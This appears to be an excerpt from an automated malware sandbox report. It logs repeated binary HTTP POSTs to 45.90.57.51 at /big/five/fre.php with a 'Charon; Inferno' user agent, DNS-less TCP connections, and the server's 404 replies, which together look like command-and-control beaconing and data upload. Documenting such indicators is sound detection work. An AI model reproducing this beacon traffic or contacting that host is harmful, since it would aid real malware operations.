Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 153Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51
Source: unknown	TCP traffic detected without corresponding DNS query: 45.90.57.51

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_00404ED4 recv,

2_2_00404ED4

Source: unknown

HTTP traffic detected: POST /big/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.90.57.51Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BBECE576Content-Length: 180Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:36:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:36:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:36:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:36:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:36:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:37:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
